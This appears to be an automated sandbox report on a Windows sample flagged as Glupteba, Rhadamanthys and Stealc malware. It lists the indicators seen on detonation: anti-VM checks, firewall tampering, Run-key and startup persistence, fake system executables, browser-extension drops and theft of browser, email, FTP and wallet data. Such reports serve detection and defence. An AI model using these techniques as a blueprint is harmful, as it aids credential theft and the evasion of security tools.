Malware Analysis Report

2024-11-30 02:16

Sample ID 240328-rn3x7ahd29
Target 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
SHA256 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
Tags
glupteba rhadamanthys stealc discovery dropper evasion loader persistence rootkit spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d

Threat Level: Known bad

The file 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d was found to be: Known bad.

Malicious Activity Summary

glupteba rhadamanthys stealc discovery dropper evasion loader persistence rootkit spyware stealer themida trojan upx

Glupteba payload

Rhadamanthys

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies firewall policy service

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of local email clients

Drops startup file

Themida packer

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Reads data files stored by FTP clients

Checks computer location settings

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Adds Run key to start application

Checks whether UAC is enabled

Drops Chrome extension

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Uses Task Scheduler COM API

Runs ping.exe

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-28 14:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-28 14:21

Reported

2024-03-28 14:23

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

145s

Command Line

sihost.exe

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A (16 identical rows: no indicator details recorded)

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Rhadamanthys

stealer rhadamanthys

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5084 created 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\system32\sihost.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6C5vrw9HlmBbodwnSru7JCve.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nq6HrOPNQV3AaiTZ2ENszitk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zdUBOSEBG9eSDmyFgN1uKQWG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwi2TsGcdAGdwOcS1B3eh5H5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rfMtcSilGcz9WSg5R9vEYI1Y.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26ZY1zErGGTZoLBKBy5Lpa8v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M67GjMBrsbsHZTc6qTnNvMHQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8iwRl3OdyFG6LeZYMrXZXLBc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sb771El5hpTNkkzOaJIpPwPM.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPMwbWVY1JbuAE8Mag8boWCx.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYaLwPfN6vuiz6R1FwtbMxQK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\PPShZLAKQ6L4xgy8fCGXP1YJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
N/A N/A C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A (9 identical rows: no indicator details recorded)

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows: no indicator details recorded)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\NhgXboc.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\gvVUloZ.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\cqdpDDd.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\amDviS.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\ZadmzDkveihSi.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
